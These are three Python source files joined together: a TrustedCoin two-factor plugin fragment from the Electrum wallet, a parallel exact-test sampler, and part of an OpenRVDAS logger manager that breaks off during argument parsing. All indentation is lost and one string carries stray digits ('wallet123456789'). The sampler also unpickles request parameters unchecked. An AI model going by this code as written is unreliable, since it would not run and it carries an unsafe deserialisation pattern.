msg = _('Google Authenticator code:')
hbox = QHBoxLayout()
hbox.addWidget(WWLabel(msg))
pw = AmountEdit(None, is_int=True)
pw.setFocus(True)
pw.setMaximumWidth(50)
hbox.addWidget(pw)
vbox.addLayout(hbox)
cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
vbox.addWidget(cb_lost)
cb_lost.setVisible(otp_secret is None)
def set_enabled():
b = True if cb_lost.isChecked() else len(pw.text()) == 6
window.next_button.setEnabled(b)
pw.textChanged.connect(set_enabled)
cb_lost.toggled.connect(set_enabled)
window.exec_layout(vbox, next_enabled=False, raise_on_cancel=False)
self.check_otp(window, short_id, otp_secret, xpub3, pw.get_amount(), cb_lost.isChecked())
@hook
def abort_send(self, window):
""" Called when the abort dialog is displayed prior to broadcasting a transaction.
Args:
window: electrum_gui.qt.main_window.ElectrumWindow
"""
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
self.waiting_dialog_for_billing_info(window)
return True
return False
def waiting_dialog_for_billing_info(self, window, *, on_finished=None):
def task():
return self.request_billing_info(window.wallet, suppress_connection_error=False)
def on_error(exc_info):
e = exc_info[1]
window.show_error("{header}\n{exc}\n\n{tor}"
.format(header=_('Error getting TrustedCoin account info.'),
exc=str(e),
tor=_('If you keep experiencing network problems, try using a Tor proxy.')))
return WaitingDialog(parent=window,
message=_('Requesting account info from TrustedCoin server...'),
task=task,
on_success=on_finished,
on_error=on_error)
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
wallet.handler_2fa.prompt_user_for_otp(wallet, tx, on_success, on_failure)
@hook
def on_new_window(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
wallet.handler_2fa = HandlerTwoFactor(self, window)
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(read_QIcon("tc.jpeg"),
_("TC"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
pw = AmountEdit(None, is_int=True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _(
'If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
def go_online_dialog(self, wizard: InstallWizard):
msg = [
_("Your wallet123456789 file is : {}.").format(os.path.abspath(wizard.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.reset_stack()
try:
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('accept_terms_of_use'))
except GoBack:
# user clicked 'Cancel' and decided to move wallet file manually
wizard.create_storage(wizard.path)
raise
def show_settings_dialog(self, window, success):
if not success:
window.show_message(_('Server not reachable.'))
return
wallet = window.wallet
d = WindowModalDialog(window, _("TrustedCoin Information"))
d.setMinimumSize(500, 200)
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("tc.jpeg")))
msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>' \
+ _(
"For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
label = QLabel(msg)
label.setOpenExternalLinks(1)
hbox.addStretch(10)
hbox.addWidget(logo)
hbox.addStretch(10)
hbox.addWidget(label)
hbox.addStretch(10)
vbox.addLayout(hbox)
vbox.addStretch(10)
msg = _(
'TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addStretch(10)
grid = QGridLayout()
vbox.addLayout(grid)
price_per_tx = wallet.price_per_tx
n_prepay = wallet.num_prepay(self.config)
i = 0
for k, v in sorted(price_per_tx.items()):
if k == 1:
continue
grid.addWidget(QLabel("Pay every %d transactions:" % k), i, 0)
grid.addWidget(QLabel(window.format_amount(v / k) + ' ' + window.base_unit() + "/tx"), i, 1)
b = QRadioButton()
b.setChecked(k == n_prepay)
b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
grid.addWidget(b, i, 2)
i += 1
n = wallet.billing_info.get('tx_remaining', 0)
grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
|
exact_test_sampler.py
|
import attr
import cffi
from collections import defaultdict, namedtuple
import itertools
from multiprocessing.pool import Pool
import pickle
import queue
import random
import os
import secrets
import threading
import time
from cffi_util import read_stripped_header
# Don't force a dependency on gRPC just for testing.
try:
from exact_test_sampler_client import get_sampler_servers
from exact_test_sampler_pb2 import AnalysisRequest, ResultSet, StatusRequest
from exact_test_sampler_pb2_grpc import ExactTestSamplerServicer
except:
print("Defaulting dummy gRPC/proto definitions in exact_test_sampler.py")
def get_sampler_servers(local_stub):
return [local_stub], True
@attr.s
class RawData:
a_values = attr.ib(factory=list)
b_values = attr.ib(factory=list)
@attr.s
class AnalysisRequest:
raw_data = attr.ib(factory=RawData)
parameters = attr.ib(factory=bytes)
@attr.s
class ResultSet:
@attr.s
class StatisticValues:
name = attr.ib(factory=str)
values = attr.ib(factory=list)
results = attr.ib(factory=list)
def SerializeToString(self):
"""We don't really serialise."""
return self
def ParseFromString(self, value):
self.results = value.results
@attr.s
class StatusRequest:
pass
class ExactTestSamplerServicer:
pass
SELF_DIR = os.path.dirname(os.path.abspath(__file__))
TOPLEVEL = os.path.abspath(SELF_DIR + "/../") + "/"
FFI = cffi.FFI()
EXACT_HEADERS = ["bench/exact_test.h"]
for header in EXACT_HEADERS:
FFI.cdef(read_stripped_header(TOPLEVEL + header))
try:
EXACT = FFI.dlopen(TOPLEVEL + "/exact.so")
except Exception as e:
print("Failed to load exact.so: %s" % e)
EXACT = None
Sample = namedtuple("Sample", ["a_class", "b_class"])
# A statistic has a name, and is defined by the preprocessing for the
# data under the null (probability that values from A is lower than
# that from B [likely not quite what one expects], and offsets to add
# to the u63 values for A and B), by the C statistic computation
# function, and by any additional argument for that function.
Statistic = namedtuple(
"Statistic",
["name", "probability_a_lower", "a_offset", "b_offset", "fn_name", "fn_args"],
)
def actual_data_results(sample, statistics):
"""Computes the actual sample value for all `statistics`, for the
sample values in `sample.a_class` and `sample.b_class`.
"""
a = sample.a_class
b = sample.b_class
def _make_buf():
buf = FFI.new("uint64_t[]", len(a) + len(b))
for i, x in enumerate(a + b):
buf[i] = x
return buf
results = dict()
m = len(a)
n = len(b)
buf = _make_buf()
total = m + n
copy = FFI.new("uint64_t[]", total)
FFI.memmove(copy, buf, total * FFI.sizeof("uint64_t"))
xoshiro = EXACT.exact_test_prng_create()
EXACT.exact_test_offset_sort(xoshiro, copy, m, n, 0, 0)
EXACT.exact_test_prng_destroy(xoshiro)
for stat in statistics:
value = getattr(EXACT, stat.fn_name)(copy, m, n, *stat.fn_args)
results[stat.name] = value
return results
def _resampled_data_results_1(sample, grouped_statistics):
"""Yields values for all the statistics in `grouped_statistics` after
shuffling values from `sample.a_class` and `sample.b_class`.
"""
# Reseed to avoid exploring the same random sequence multiple
# times when multiprocessing.
EXACT.exact_test_prng_seed(secrets.randbits(64))
a = sample.a_class
b = sample.b_class
def _make_buf():
buf = FFI.new("uint64_t[]", len(a) + len(b))
for i, x in enumerate(a + b):
buf[i] = x
return buf
m = len(a)
n = len(b)
buf = _make_buf()
total = m + n
shuffled_buf = FFI.new("uint64_t[]", total)
sorted_buf = FFI.new("uint64_t[]", total)
error_ptr = FFI.new("char**")
xoshiro = EXACT.exact_test_prng_create()
def compute_results():
results = dict()
for p_a_lt, stats_for_p in grouped_statistics.items():
FFI.memmove(shuffled_buf, buf, total * FFI.sizeof("uint64_t"))
if not EXACT.exact_test_shuffle(
xoshiro, shuffled_buf, m, n, p_a_lt, error_ptr
):
raise Exception(
"Shuffle failed: %s" % str(FFI.string(error_ptr[0]), "utf-8")
)
for (a_offset, b_offset), stats_for_offset in stats_for_p.items():
FFI.memmove(sorted_buf, shuffled_buf, total * FFI.sizeof("uint64_t"))
EXACT.exact_test_offset_sort(
xoshiro, sorted_buf, m, n, a_offset, b_offset
)
for stat in stats_for_offset:
results[stat.name] = getattr(EXACT, stat.fn_name)(
sorted_buf, m, n, *stat.fn_args
)
return results
try:
while True:
yield compute_results()
finally:
EXACT.exact_test_prng_destroy(xoshiro)
def _convert_result_arrays_to_proto(dict_of_arrays):
ret = ResultSet()
for name, values in dict_of_arrays.items():
proto = ResultSet.StatisticValues()
proto.statistic_name = name
proto.values[:] = values
ret.results.append(proto)
return ret
def _convert_proto_to_result_dicts(result_set):
max_length = max(len(stats.values) for stats in result_set.results)
dicts = [dict() for _ in range(max_length)]
for stats in result_set.results:
name = stats.statistic_name
for i, value in enumerate(stats.values):
dicts[i][name] = value
return dicts
def _generate_in_parallel_worker(generator_fn, generator_args, max_results, max_delay):
"""Toplevel worker for a process pool. Batches values yielded by
`generator_fn(*generator_args)` until we have too many values, or
we hit `max_delay`, and then return that list of values, converted
to a ResultSet.
We apply some jitter to both `max_results` and `max_delay` to avoid
synchronisation and then thundering herd issues.
"""
max_results = 1 + int(max_results * (0.5 + random.random()))
max_delay *= 0.5 + random.random()
results = defaultdict(list)
end = time.monotonic() + max_delay
for i, value in enumerate(generator_fn(*generator_args)):
for k, v in value.items():
results[k].append(v)
if i >= max_results or time.monotonic() >= end:
return _convert_result_arrays_to_proto(results)
# At first, return as soon as we have INITIAL_BATCH_SIZE results
INITIAL_BATCH_SIZE = 10
# And let that limit grow up to MAX_BATCH_SIZE
MAX_BATCH_SIZE = 100 * 1000
# Growth rate for the batch size
BATCH_SIZE_GROWTH_FACTOR = 2
# We wait for up to this fraction of the total computation runtime
# before returning values
PROPORTIONAL_DELAY = 0.05
# Wait for at least MIN_DELAY seconds before returning the values we have
MIN_DELAY = 0.05
# And wait for up to MAX_DELAY seconds before returning.
MAX_DELAY = 10
# We lazily create a pool of POOL_SIZE workers.
POOL_SIZE = max(1, os.cpu_count() - 1)
POOL_LOCK = threading.Lock()
POOL = None
# Backoff parameters when polling for updates in _generate_in_parallel.
POLL_PROPORTIONAL_DELAY = 0.5
POLL_MIN_DELAY = 0.01
POLL_MAX_DELAY = 1.0
def _init_worker():
os.nice(20)
def ensure_pool(pool_size=POOL_SIZE):
"""Returns the global process pool, after creating it if necessary.
If a new pool must be created, it will have `pool_size` worker
processes.
"""
global POOL
with POOL_LOCK:
if POOL is None:
POOL = Pool(pool_size, _init_worker, initargs=(), maxtasksperchild=100)
return POOL
def _generate_in_parallel(generator_fn, generator_args_fn, stop_event=None):
"""Yields values returned by parallel calls to
`generator_fn(*generator_args_fn())` in arbitrary order.
If `stop_event` is provided, returns when `stop_event.is_set()`.
"""
# We want multiprocessing to avoid the GIL. We use relatively
# coarse-grained futures (instead of a managed queue) to simplify
# the transition to RPCs.
if stop_event is None:
stop_event = threading.Event()
# We queue up futures, with up to `max_waiting` not yet running.
max_waiting = 2
pending = []
begin = time.monotonic()
batch_size = INITIAL_BATCH_SIZE
pool = ensure_pool()
def backoff(last_change):
elapsed = time.monotonic() - last_change
delay = POLL_PROPORTIONAL_DELAY * elapsed
if delay < POLL_MIN_DELAY:
delay = POLL_MIN_DELAY
if delay > POLL_MAX_DELAY:
delay = POLL_MAX_DELAY
stop_event.wait(delay)
def consume_completed_futures():
active = []
completed = []
for future in pending:
if future.ready():
completed.append(future)
else:
active.append(future)
pending.clear()
pending.extend(active)
return [future.get(0) for future in completed]
# Adds a new work unit to the pending list.
def add_work_unit():
delay = PROPORTIONAL_DELAY * (time.monotonic() - begin)
if delay < MIN_DELAY:
delay = MIN_DELAY
if delay > MAX_DELAY:
delay = MAX_DELAY
future_results = pool.apply_async(
_generate_in_parallel_worker,
(generator_fn, generator_args_fn(), batch_size, delay),
)
pending.append(future_results)
def fill_pending_list():
any_change = False
for _ in range(POOL_SIZE + max_waiting):
# Yeah, we're using internals, but this one hasn't
# changed since 3.5 (or earlier), and I don't know why
# this value isn't exposed.
if pool._taskqueue.qsize() >= max_waiting:
break
add_work_unit()
any_change = True
return any_change
fill_pending_list()
last_activity = begin
while not stop_event.is_set():
any_completed = False
for completed in consume_completed_futures():
yield completed
any_completed = True
if any_completed:
batch_size = min(BATCH_SIZE_GROWTH_FACTOR * batch_size, MAX_BATCH_SIZE)
any_change = fill_pending_list()
if any_completed or any_change:
last_activity = time.monotonic()
else:
backoff(last_activity)
@attr.s
class ExactTestParameters:
# Signaled when the request should be exited
done = attr.ib(factory=threading.Event)
# Signaled when sample and params are both populated...
# or when the request should be exited, since it's so
# hard to wait on two events.
ready = attr.ib(factory=threading.Event)
lock = attr.ib(factory=threading.Lock)
sample = attr.ib(default=None)
params = attr.ib(default=None)
class ExactTestSampler(ExactTestSamplerServicer):
# How long to wait for a_values, b_values, and params.
INITIAL_DATA_TIMEOUT = 60
@staticmethod
def _update_test_params(params, update_requests, ctx):
try:
for analysis_request in update_requests:
if ctx and not ctx.is_active():
break
with params.lock:
if (
analysis_request.raw_data.a_values
or analysis_request.raw_data.b_values
):
params.sample = Sample(
a_class=list(analysis_request.raw_data.a_values),
b_class=list(analysis_request.raw_data.b_values),
)
if analysis_request.parameters:
params.params = pickle.loads(analysis_request.parameters)
if params.sample is not None and params.params is not None:
params.ready.set()
finally:
params.done.set()
params.ready.set()
def status(self, request, context):
return StatusRequest()
def simulate(self, requests, ctx):
"""Requests is an iterator of AnalysisRequest. This method yields
arrays of analysis values, and is not yet a full-blown Servicer
implementation.
"""
params = ExactTestParameters()
updater = None
def read_params():
with params.lock:
return (params.sample, params.params)
def mark_cancelled():
params.done.set()
params.ready.set()
if ctx is not None:
ctx.add_callback(mark_cancelled)
try:
updater = threading.Thread(
target=self._update_test_params,
args=(params, requests, ctx),
daemon=True,
)
updater.start()
if not params.ready.wait(timeout=self.INITIAL_DATA_TIMEOUT):
return
if params.done.is_set():
return
for value in _generate_in_parallel(
_resampled_data_results_1, read_params, params.done
):
if params.done.is_set():
break
yield value
if params.done.is_set():
break
finally:
params.done.set()
params.ready.set()
if updater is not None and updater.is_alive():
updater.join(0.001)
class BufferedIterator:
"""Exposes a queue-like interface for a array of arbitrary iterator.
Works by internally spinning up a reader thread.
"""
BUFFER_SIZE = 4
def __init__(self, iterators, block_on_exit=True):
self.iterators = iterators
self.queue = queue.Queue(self.BUFFER_SIZE + 2 * len(self.iterators))
self.done = threading.Event()
self.workers = None
self.block_on_exit = block_on_exit
def is_done(self):
return self.done.is_set() or self.worker is None or not self.worker.is_alive()
# get and get_nowait may None to denote the end of the iterator.
def get(self, block=True, timeout=None):
return self.queue.get(block, timeout)
def get_nowait(self):
return self.queue.get_nowait()
def _pull_from_iterator(self, iterator):
for value in iterator:
if self.done.is_set():
break
self.queue.put(value)
if self.done.is_set():
break
# Make sure the reader wakes up. If the queue is full, the
# reader should soon grab an item and notice that the queue is
# done.
self.done.set()
try:
self.queue.put_nowait(None)
except queue.Full:
pass
def __enter__(self):
self.done.clear()
self.workers = []
for iterator in self.iterators:
worker = threading.Thread(target=self._pull_from_iterator, args=(iterator,))
worker.start()
self.workers.append(worker)
return self
def __exit__(self, *_):
self.done.set()
try:
# Make sure there's a value in the queue.
self.queue.put_nowait(None)
except queue.Full:
pass
for worker in self.workers:
try:
for _ in self.workers:
self.queue.get_nowait()
except queue.Empty:
pass
worker.join(None if self.block_on_exit else 0)
def resampled_data_results(sample, grouped_statistics_queue, inline_eval=None):
"""Yields values computed by the `Statistics` returned by
`grouped_statistics_queue.get()` after reshuffling values from
`sample.a_class` and `sample.b_class`.
"""
request_queues = []
cached_stats = [None]
def grouped_statistics_fn(block=False):
try:
cached_stats[0] = grouped_statistics_queue.get(block=block)
req = AnalysisRequest()
req.parameters = pickle.dumps(cached_stats[0])
for reqqueue in request_queues:
reqqueue.put(req)
except queue.Empty:
pass
return cached_stats[0]
def serial_generator():
"""Calls the generator fn to get new values, while regenerating the
arguments from time to time.
"""
current_stats = grouped_statistics_fn()
while True:
for value in _resampled_data_results_1(sample, current_stats):
yield value
new_stats = grouped_statistics_fn()
if current_stats is not new_stats:
current_stats = new_stats
break
try:
samplers, config_inline_eval = get_sampler_servers(ExactTestSampler())
if inline_eval is None:
inline_eval = config_inline_eval
initial_req = AnalysisRequest()
initial_req.raw_data.a_values[:] = sample.a_class
initial_req.raw_data.b_values[:] = sample.b_class
for _ in samplers:
request_queues.append(queue.SimpleQueue())
request_queues[-1].put(initial_req)
# Make sure we have an initial value for the analysis parameers.
grouped_statistics_fn(block=True)
parallel_generators = [
sampler.simulate(iter(queue.get, None), None)
for sampler, queue in zip(samplers, request_queues)
]
with BufferedIterator(parallel_generators, block_on_exit=False) as buf:
try:
inline_values = (
serial_generator() if inline_eval else itertools.repeat(None)
)
for value in inline_values:
if inline_eval:
yield value
try:
while True:
# If inline_eval is disabled, we only
# yield values received through `buf`.
# We should block.
par_value = buf.get(block=not inline_eval)
if par_value is None:
return
for value in _convert_proto_to_result_dicts(par_value):
yield value
# Try and update the config.
grouped_statistics_fn()
except queue.Empty:
pass
finally:
for reqqueue in request_queues:
reqqueue.put(None)
finally:
# Mark the end of the request iterator.
for reqqueue in request_queues:
reqqueue.put(None)
|
logger_manager.py
|
#! /usr/bin/env python3
"""
"""
import datetime
import getpass # to get username
import logging
import multiprocessing
import os
import signal
import socket # to get hostname
import sys
import threading
import time
from importlib import reload
from os.path import dirname, realpath
# Add the openrvdas components onto sys.path
sys.path.append(dirname(dirname(realpath(__file__))))
# Imports for running CachedDataServer
from server.cached_data_server import CachedDataServer # noqa: E402
from server.logger_supervisor import LoggerSupervisor # noqa: E402
from server.server_api import ServerAPI # noqa: E402
from logger.transforms.to_das_record_transform import ToDASRecordTransform # noqa: E402
from logger.utils.stderr_logging import DEFAULT_LOGGING_FORMAT # noqa: E402
from logger.utils.stderr_logging import StdErrLoggingHandler # noqa: E402
from logger.utils.read_config import read_config # noqa: E402
# For sending stderr to CachedDataServer
from logger.utils.das_record import DASRecord # noqa: E402
from logger.writers.cached_data_writer import CachedDataWriter # noqa: E402
from logger.writers.composed_writer import ComposedWriter # noqa: E402
DEFAULT_MAX_TRIES = 3
SOURCE_NAME = 'LoggerManager'
USER = getpass.getuser()
HOSTNAME = socket.gethostname()
DEFAULT_DATA_SERVER_WEBSOCKET = 'localhost:8766'
############################
def kill_handler(self, signum):
"""Translate an external signal (such as we'd get from os.kill) into a
KeyboardInterrupt, which will signal the start() loop to exit nicely."""
raise KeyboardInterrupt('Received external kill signal')
################################################################################
################################################################################
class LoggerManager:
############################
def __init__(self,
api, supervisor, data_server_websocket=None,
stderr_file_pattern='/var/log/openrvdas/{logger}.stderr',
interval=0.25, log_level=logging.info, logger_log_level=logging.WARNING):
"""Read desired/current logger configs from Django DB and try to run the
loggers specified in those configs.
```
api - ServerAPI (or subclass) instance by which LoggerManager will get
its data store updates
supervisor - a LoggerSupervisor object to use to manage logger
processes.
data_server_websocket - cached data server host:port to which we are
going to send our status updates.
stderr_file_pattern - Pattern into which logger name will be
interpolated to create the file path/name to which the
logger's stderr will be written. E.g.
'/var/log/openrvdas/{logger}.stderr' If
data_server_websocket is defined, will write logger
stderr to it.
interval - number of seconds to sleep between checking/updating loggers
log_level - LoggerManager's log level
logger_log_level - At what logging level our component loggers
should operate.
```
"""
# Set signal to catch SIGTERM and convert it into a
# KeyboardInterrupt so we can shut things down gracefully.
try:
signal.signal(signal.SIGTERM, kill_handler)
except ValueError:
logging.warning('LoggerManager not running in main thread; '
'shutting down with Ctl-C may not work.')
# api class must be subclass of ServerAPI
if not issubclass(type(api), ServerAPI):
raise ValueError('Passed api "%s" must be subclass of ServerAPI' % api)
self.api = api
self.supervisor = supervisor
# Data server to which we're going to send status updates
if data_server_websocket:
self.data_server_writer = CachedDataWriter(data_server_websocket)
else:
self.data_server_writer = None
self.stderr_file_pattern = stderr_file_pattern
self.interval = interval
self.logger_log_level = logger_log_level
# Try to set up logging, right off the bat: reset logging to its
# freshly-imported state and add handler that also sends logged
# messages to the cached data server.
reload(logging)
logging.basicConfig(format=DEFAULT_LOGGING_FORMAT, level=log_level)
if self.data_server_writer:
cds_writer = ComposedWriter(
transforms=ToDASRecordTransform(data_id='stderr',
field_name='stderr:logger_manager'),
writers=self.data_server_writer)
logging.getLogger().addHandler(StdErrLoggingHandler(cds_writer))
# How our various loops and threads will know it's time to quit
self.quit_flag = False
# Where we store the latest cruise definition and status reports.
self.cruise = None
self.cruise_filename = None
self.cruise_loaded_time = 0
self.loggers = {}
self.config_to_logger = {}
self.logger_status = None
self.status_time = 0
# We loop to check the logger status and pass it off to the cached
# data server. Do this in a separate thread.
self.check_logger_status_thread = None
# We'll loop to check the API for updates to our desired
# configs. Do this in a separate thread. Also keep track of
# currently active configs so that we know when an update is
# actually needed.
self.update_configs_thread = None
self.config_lock = threading.Lock()
self.active_mode = None # which mode is active now?
self.active_configs = None # which configs are active now?
############################
def start(self):
"""Start the threads that make up the LoggerManager operation:
1. Configuration update loop
2. Loop to read logger stderr/status and either output it or
transmit it to a cached data server
Start threads as daemons so that they'll automatically terminate
if the main thread does.
"""
logging.info('Starting LoggerManager')
# Check logger status in a separate thread. If we've got the
# address of a data server websocket, send our updates to it.
self.check_logger_status_loop_thread = threading.Thread(
name='check_logger_status_loop',
target=self._check_logger_status_loop, daemon=True)
self.check_logger_status_loop_thread.start()
# Update configs in a separate thread.
self.update_configs_thread = threading.Thread(
name='update_configs_loop',
target=self._update_configs_loop, daemon=True)
self.update_configs_thread.start()
# Check logger status in a separate thread. If we've got the
# address of a data server websocket, send our updates to it.
self.send_cruise_definition_loop_thread = threading.Thread(
name='send_cruise_definition_loop',
target=self._send_cruise_definition_loop, daemon=True)
self.send_cruise_definition_loop_thread.start()
############################
def quit(self):
"""Exit the loop and shut down all loggers."""
self.quit_flag = True
############################
def _load_new_definition_from_api(self):
"""Fetch a new cruise definition from API and build local maps. Then
send anupdated cruise definition to the console.
"""
logging.info('Fetching new cruise definitions from API')
try:
with self.config_lock:
self.loggers = self.api.get_loggers()
self.config_to_logger = {}
for logger, logger_configs in self.loggers.items():
# Map config_name->logger
for config in self.loggers[logger].get('configs', []):
self.config_to_logger[config] = logger
# This is a redundant grab of data when we're called from
# _send_cruise_definition_loop(), but we may also be called
# from a callback when the API alerts us that something has
# changed. So we need to re-grab self.cruise
self.cruise = self.api.get_configuration() # a Cruise object
self.cruise_filename = self.cruise.get('config_filename', None)
loaded_time = self.cruise.get('loaded_time')
self.cruise_loaded_time = datetime.datetime.timestamp(loaded_time)
self.active_mode = self.api.get_active_mode()
# Send updated cruise definition to CDS for console to read.
cruise_dict = {
'cruise_id': self.cruise.get('id', ''),
'filename': self.cruise_filename,
'config_timestamp': self.cruise_loaded_time,
'loggers': self.loggers,
'modes': self.cruise.get('modes', {}),
'active_mode': self.active_mode,
}
logging.info('Sending updated cruise definitions to CDS.')
self._write_record_to_data_server(
'status:cruise_definition', cruise_dict)
except (AttributeError, ValueError, TypeError) as e:
logging.info('Failed to update cruise definition: %s', e)
############################
def _check_logger_status_loop(self):
"""Grab logger status message from supervisor and send to cached data
server via websocket. Also send cruise mode as separate message.
"""
while not self.quit_flag:
now = time.time()
try:
config_status = self.supervisor.get_status()
with self.config_lock:
# Stash status, note time and send update
self.config_status = config_status
self.status_time = now
self._write_record_to_data_server('status:logger_status', config_status)
# Now get and send cruise mode
mode_map = {'active_mode': self.api.get_active_mode()}
self._write_record_to_data_server('status:cruise_mode', mode_map)
except ValueError as e:
logging.warning('Error while trying to send logger status: %s', e)
time.sleep(self.interval)
############################
def _update_configs_loop(self):
"""Iteratively check the API for updated configs and send them to the
appropriate LoggerRunners.
"""
while not self.quit_flag:
self._update_configs()
time.sleep(self.interval)
############################
def _update_configs(self):
"""Get list of new (latest) configs. Send to logger supervisor to make
any necessary changes.
Note: we can't fold this into _update_configs_loop() because we may
need to ask the api to call it independently as a callback when it
notices that the config has changed. Search for the line:
api.on_update(callback=logger_manager._update_configs)
in this file to see where.
"""
# First, grab a status update.
# self.logger_status = self.supervisor.check_status()
# self.status_time = time.time()
with self.config_lock:
# Get new configs in dict {logger:{'configs':[config_name,...]}}
logger_configs = self.api.get_logger_configs()
if logger_configs:
supervisor.update_configs(logger_configs)
self.active_configs = logger_configs
############################
def _send_cruise_definition_loop(self):
"""Iteratively assemble information from DB about what loggers should
exist and what states they *should* be in. We'll send this to the
cached data server whenever it changes (or if it's been a while
since we have).
Also, if the logger or config names have changed, signal that we
need to create a new config file for the supervisord process to
use.
Looks like:
{'active_mode': 'log',
'cruise_id': 'NBP1406',
'loggers': {'PCOD': {'active': 'PCOD->file/net',
'configs': ['PCOD->off',
'PCOD->net',
'PCOD->file/net',
'PCOD->file/net/db']},
next_logger: next_configs,
...
},
'modes': ['off', 'monitor', 'log', 'log+db']
}
"""
last_loaded_timestamp = 0
while not self.quit_flag:
try:
self.cruise = self.api.get_configuration() # a Cruise object
if not self.cruise:
logging.info('No cruise definition found in API')
time.sleep(self.interval * 2)
continue
self.cruise_filename = self.cruise.get('config_filename', None)
loaded_time = self.cruise.get('loaded_time')
self.cruise_loaded_time = datetime.datetime.timestamp(loaded_time)
# Has cruise definition file changed since we loaded it? If so,
# send a notification to console so it can ask if user wants to
# reload.
if self.cruise_filename:
try:
mtime = os.path.getmtime(self.cruise_filename)
if mtime > self.cruise_loaded_time:
logging.debug('Cruise file timestamp changed!')
self._write_record_to_data_server('status:file_update', mtime)
except FileNotFoundError:
logging.debug('Cruise file "%s" has disappeared?', self.cruise_filename)
# Does database have a cruise definition with a newer timestamp?
# Means user loaded/reloaded definition. Update our maps to
# reflect the new values and send an updated cruise_definition
# to the console.
if self.cruise_loaded_time > last_loaded_timestamp:
last_loaded_timestamp = self.cruise_loaded_time
logging.info('New cruise definition detected - rebuilding maps.')
self._load_new_definition_from_api()
except KeyboardInterrupt: # (AttributeError, ValueError, TypeError):
logging.warning('No cruise definition found in API')
# Whether or not we've sent an update, sleep
time.sleep(self.interval * 2)
############################
def _write_record_to_data_server(self, field_name, record):
"""Format and label a record and send it to the cached data server.
"""
if self.data_server_writer:
das_record = DASRecord(fields={field_name: record})
logging.debug('DASRecord: %s' % das_record)
self.data_server_writer.write(das_record)
else:
logging.info('Update: %s: %s', field_name, record)
################################################################################
def run_data_server(data_server_websocket,
data_server_back_seconds, data_server_cleanup_interval,
data_server_interval):
"""Run a CachedDataServer (to be called as a separate process),
accepting websocket connections to receive data to be cached and
served.
"""
# First get the port that we're going to run the data server on. Because
# we're running it locally, it should only have a port, not a hostname.
# We should try to handle it if they prefix with a ':', though.
data_server_websocket = data_server_websocket or DEFAULT_DATA_SERVER_WEBSOCKET
websocket_port = int(data_server_websocket.split(':')[-1])
server = CachedDataServer(port=websocket_port, interval=data_server_interval)
# The server will start serving in its own thread after
# initialization, but we need to manually fire up the cleanup loop
# if we want it. Maybe we should have this also run automatically in
# its own thread after initialization?
server.cleanup_loop()
################################################################################
if __name__ == '__main__': # noqa: C901
import argparse
import atexit
import readline
from server.server_api_command_line import ServerAPICommandLine
parser = argparse.ArgumentParser()
parser.add_argument('--config', dest='config', action='store',
help='Name of configuration file to load.')
parser.add_argument('--mode', dest='mode', action='store', default=None,
help='Optional name of mode to start system in.')
parser.add_argument('--database', dest='database', action='store',
choices=['memory', 'django'],
default='memory', help='What backing store database '
'to use.')
parser.add_argument('--stderr_file_pattern', dest='stderr_file_pattern',
default='/var/log/openrvdas/{logger}.stderr',
help='Pattern into which logger name will be '
'interpolated to create the file path/name to which '
'the logger\'s stderr will be written. E.g. '
'\'/var/log/openrvdas/{logger}.stderr\'')
# Arguments for cached data server
parser.add_argument('--data_server_websocket', dest='data_server_websocket',
action='store', default=None,
help='Address at which to connect to cached data server '
'to send status updates.')
parser.add_argument('--start_data_server', dest='start_data_server',
action='store_true', default=False,
help='Whether to start our own cached data server.')
parser.add_argument('--data_server_back_seconds',
dest='data_server_back_seconds', action='store',
type=float, default=480,
help='Maximum number of seconds of old data to keep '
'for serving to new clients.')
parser.add_argument('--data_server_cleanup_interval',
dest='data_server_cleanup_interval',
action='store', type=float, default=60,
help='How often to clean old data out of the cache.')
parser.add_argument('--data_server_interval', dest='data_server_interval',
action='store', type=float, default=1,
help='How many seconds to sleep between successive '
'sends of data to clients.')
parser.add_argument('--interval', dest='interval', action='store',
type=float, default=0.5,
help='How many seconds to sleep between logger checks.')
parser.add_argument('--max_tries', dest='max_tries', action='store', type=int,
default=DEFAULT_MAX_TRIES,
help='Number of times to retry failed loggers.')
parser.add_argument('--no-console', dest='no_console', default=False,
action='store_true', help='Run without a console '
'that reads commands from stdin.')
parser.add_argument('-v', '--verbosity', dest='verbosity',
default=0, action='count',
help='Increase output verbosity')
parser.add_argument('-V', '--logger_verbosity', dest='logger_verbosity',
default=0, action='count',
help='Increase output verbosity of component loggers')
